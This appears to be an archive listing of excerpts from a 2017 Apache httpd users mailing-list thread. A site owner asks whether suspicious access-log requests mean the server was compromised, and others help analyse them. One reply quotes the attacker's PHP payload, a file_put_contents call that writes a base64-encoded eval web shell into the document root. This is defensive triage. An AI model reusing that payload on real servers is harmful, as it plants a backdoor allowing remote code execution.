Re: [users@httpd] am i hacked ?

2017-02-07 Thread Erik Dobák
with the current number of critters around probably yes. E On 6 February 2017 at 23:05, Wim Lewis wrote: > > On 2/6/2017 8:36 AM, Jack Swan wrote: > > What upsets me is that these two requests have status code 200, which > means it was successful. > > As Jonesy points out,

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Wim Lewis
On 2/6/2017 8:36 AM, Jack Swan wrote: > What upsets me is that these two requests have status code 200, which means it > was successful. As Jonesy points out, it's normal for the web server to simply ignore a request's query-string in a request where it wouldn't mean anything. So Apache is

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier
");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; - Original Message - From: bernd.len...@helmholtz-muenchen.de To: users@httpd.apache.org Sent: Mo

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 8:22 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: >> OK. I think I understand most of it. >> First the attacker sets some values appropriate for him. Then he tries to >> create >> a file webconfig.txt.php and to write >> in it. >> Fortunately wwwrun

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
> OK. I think I understand most of it. > First the attacker sets some values appropriate for him. Then he tries to > create > a file webconfig.txt.php and to write > in it. > Fortunately wwwrun can't write in /sr/www ... , following > http://httpd.apache.org/docs/2.2/misc/security_tips.html

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > >> The first line is trying to create the file webconfig.txt.php in your >> DOCUMENT_ROOT directory, with the contents of the

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Eric Covener
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog wrote: > I see these type of attack strings all the time on Nginx except Nginx gives > a 403. Apache is notoriously bad with security and giving 200 ok responses > makes you yourself. A reason I and many other people

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote: > The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the >

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Mitchell Krog
I see these type of attack strings all the time on Nginx except Nginx gives a 403. Apache is notoriously bad with security and giving 200 ok responses makes you yourself. A reason I and many other people have switched. User support on this list was also non-existent when I ran into serious

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Ken Robinson
On 2017-02-06 12:08 pm, Lentes, Bernd wrote: The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being: I didn't decode the remaining lines. I think they're just trying to do the same thing. Fortunately there is

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
> The first line is trying to create the file webconfig.txt.php in your > DOCUMENT_ROOT directory, with the contents of the file being: > > > > I didn't decode the remaining lines. I think they're just trying to do the > same > thing. > Fortunately there is no webconfig.txt.php. And all

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote: > Actually now that I re-read the requests it also looks as shellshock successful > attempt. > Operative system software not updated recently either? > 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > : >> Have you

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan
To: users@httpd.apache.org Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern Subject: Re: [users@httpd] am i hacked ? - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment I found two very weird entri

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Actually now that I re-read the requests it also looks as shellshock successful attempt. Operative system software not updated recently either? 2017-02-06 17:42 GMT+01:00 Daniel : > Have you tried to send those requests yourself and see what you get? > > Still those requests

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Have you tried to send those requests yourself and see what you get? Still those requests seem to be aimed at your php framework. Do you use a very old php version as well? 2017-02-06 17:41 GMT+01:00 Lentes, Bernd : > > - On Feb 6, 2017, at 5:14 PM,

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.len...@helmholtz-muenchen.de wrote: > Hi, > > just in the moment I found two very weird entries in my access_log: > > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET >

Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan
04 AM GMT -05:00 US/Canada Eastern Subject: [users@httpd] am i hacked ? Hi, just in the moment I found two very weird entries in my access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quo

[users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
Hi, just in the moment I found two very weird entries in my access_log: 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET